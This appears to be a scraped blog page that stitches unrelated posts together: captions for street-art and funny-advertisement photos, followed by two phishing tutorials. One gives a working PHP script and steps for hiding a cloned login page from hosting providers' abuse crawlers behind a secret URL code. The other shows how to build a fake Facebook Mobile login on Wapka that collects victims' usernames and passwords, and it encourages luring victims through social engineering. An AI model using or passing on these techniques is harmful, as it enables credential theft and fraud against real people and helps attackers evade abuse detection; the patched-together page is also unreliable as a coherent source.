Very Cool Street Arts Photos


Just want to show you simple yet so cool street arts. These are products of very imaginative and creative minds. Discover them for yourself! 

Hahaha! Just like drinking softdrinks!
The colors add life to the tree.
A cheerleader with the grass as her pompom...
A sample of a chalk drawing...
And what do you think the man is pushing?
A colorful painting...
A silhouette of a woman's body. Well, something noticeable is the grass at the middle part. 
This is somehow scary...
A gate like pencils of different colors...
Just tear here...

20 Funny and amazing advertisements photos.Another collections of funny, weird advertisements



Cool advertisement picture
funny advertisements
Funny tootbrush advertisement.
funny advertisements
Funny windows OS advertisement.
funny advertisements
Funny and sexy advertisement for beer.
funny advertisements
Funny Nike advertisement.

funny advertisements
Unique advertisement photo.

funny advertisements
Amazing ads

funny advertisements
Funny seat advertisement picture.

funny advertisements
Light advertisement photo.

funny advertisements


funny advertisements
Funny road advertisement.

funny advertisements
Cool and funny advertisement for jeans.
funny advertisements
Funny Sony PSP advertisement.
funny advertisements
Funny shoe advertisement of Adidas.
funny advertisements

funny advertisements

funny advertisements

funny advertisements

funny advertisements

funny advertisements
lol

Cool and Funny Street Arts (New)


We have posted similar street arts topics before. This time, we give you another batch of new and cool street arts. We hope you will be delighted...
















Make Successful Phishing Without Getting Catch by Web Hosting sites

Hacking web application is always curious for the script kiddies.
And hacking free web email account is every geek first attempt and it was also same for me too.
I have created my first phishing page when I was in standard 9.
After i'v created the phishing page it's got suspended within 5-6 hours. :( So it was a big challenge for me to host my phishing sites. But it was big a challenge until I’v learned some basics of php.


Here i will not describe how phishing works and how to make fake page.
I will describe how can you fool your hosting provides and host your phishing content to their server without getting suspended by them.



While Web Hosting providers attempts to find all phishing attempts from their servers, sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files.

This concept is to serve a different innocent looking web page instead of your phishing page when your hosting provider try to access your uploaded content.
but when you send the link to your phishing site to victim you will send the link with a unique identification number(through URL i will come to this later).
Then only your innocent looking uploaded file turn into a phishing page.

I have tried this with 2-3 free hosting providers and every time i succeeded.
In normal scenario when you design your phishing page and upload files to your hosting account,
your Web Hosting provider attempts to find all phishing attempts from their servers, Maximum time they do this by using automated crawlers. If the crawler find any Forbidden character in your uploaded files. Sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files and may suspend your account.


So how to bypass this??


Open any page you want to clone in your favorite browser.

Save the full page in .html.This step is almost common for every phishing attempt.

After saving the page you will get the page's source code and also get a folder containing all the images and client side scripts.
I am assuming, you know how to configure the action field of the form/login page to configure a phishing page.
So after changing the action field what you have to do just rename the “html” page to ".jpg"
For example if you have "Login.html". Just rename it to "Login.jpg".

Now you have to choose any web page which will be served when your web hosting providers or anyone without having that unique identification number access the page.Do the same thing with that fake page also and rename it to "fake.jpg"

Create a new file called “phishing.php” and write following content into it.

<?php
$id = $_GET["code"];
if ($id == "yourpasscode") {
      $myFile = "main.jpg";
      $fh = fopen($myFile, 'r');
      $theData = fread($fh, 500000);
      fclose($fh);
      echo $theData;
}

else{
     $myFile1 = "fake.jpg";
     $fh1 = fopen($myFile1, 'r');
     $theData1 = fread($fh1, 500000);
     fclose($fh1);
     echo $theData1;
}
?>

In this code you just have to do following modification..

1>Change "yourpasscode" to your desired one.
2>Change "main.jpg" to the file name which one contain the real phishing web page's code "Login.jpg"
3>Change "fake.jpg" to the file which file will contain the code of the fake page.




Now you have got the follwing files:

1)phishing.php
2)login.jpg
3)fake.jpg
4)A folder[Contains all the client side scriots and images for the real phishing page]



Now just upload all this to your hosting account.And try to access the
http://yoursite.com/phishing.php 
with your browser.

Here you will get the fake page which is not actual login page.

Now try to access
http://yoursite.com/phishing.php?code=yourpasscode
your phishing page will open.

If you want to change the GET parameter "code" just modify the second line of the php script.

Now what will happen,when your hosting privder will test your content they will get a innocent php file reading another file.and when they try will to access "login.jpg" file they will get an invalid/corrupted image.

Hack facebook Account by Mobile - Phishing


What is Phishing ?
Phishing is a way of deceiving your victim by making him login through one of your webpages which is a copy of the original one. By doing so the fake webpage will save his E-mail ID or username and password. This is used for criminal activities for stealing Credits Cards and So on.

Now we are going to make a fake login page of Facebook Mobile.

Lets start the tutorial...
Step 1: Register a new Wapka Account
First create a new wapka account from the link below.
image

Step 2: Editing Wapka Texts
Login to your Wapka account. Goto Settings>Edit text> Forum/chat and change the following words,

Name: Email or Phone 
Text: Password 
Submit: Log In 
It's shown in the screenshot below.
image
Click 'Edit' to save and Login to your account in ADMIN mode.
Step 3: Create a new forum
Create a new forum to save all hacked usernames and passwords in your site.
You can do it by Edit Site>Forum
Wapka forum
Get inside your newly created forum and note down its Forum ID. You can find it at the right bottom corner of the forum. Its shown below.
Forum ID
Step 4: Change Forum Visibility 
The forum we create above will be visible to everyone. Now we have to change its visiblity, so that admin can only view the hacked usernames and passwords.
You can do it by Edit site>Users>Items visibility
Mark 'X' to make it visible only in admin mode.
image
Step 5: Uploading Facebook Mobile Phisher Page Source Code
Just copy and paste the code below in your site.
You can add it by Edit site>WML/HTML code

Note: But before pasting, edit the code and replace 'XXXXXXX' with your Forum ID( as you found it in step 4) and remove spaces in small form tag.

Now you can see your fully designed facebook phishing page.
But there'll be only one filed instead of 'Email or Phone' and 'Password' fields.
Don't worry, wapka won't ask usernames when you are logged in.
So just logout your admin mode or open your site url in a new tab. You'll see a page like this.
image
* You can find all hacked usernames and passwords in the forum by logging in as ADMIN.
Now use your social engineering skill to make the vitim to login in your site. You can send him a message with your link.
Disclaimer: DO NOT use this for fraudulent activities use this just to gain knowledge and not to cause harm to other people in any sort.
By trying this trick, you'll surely learn the basics of Hacking, HTML and Wapka.

If you got any problem, then describe the problem in comments below...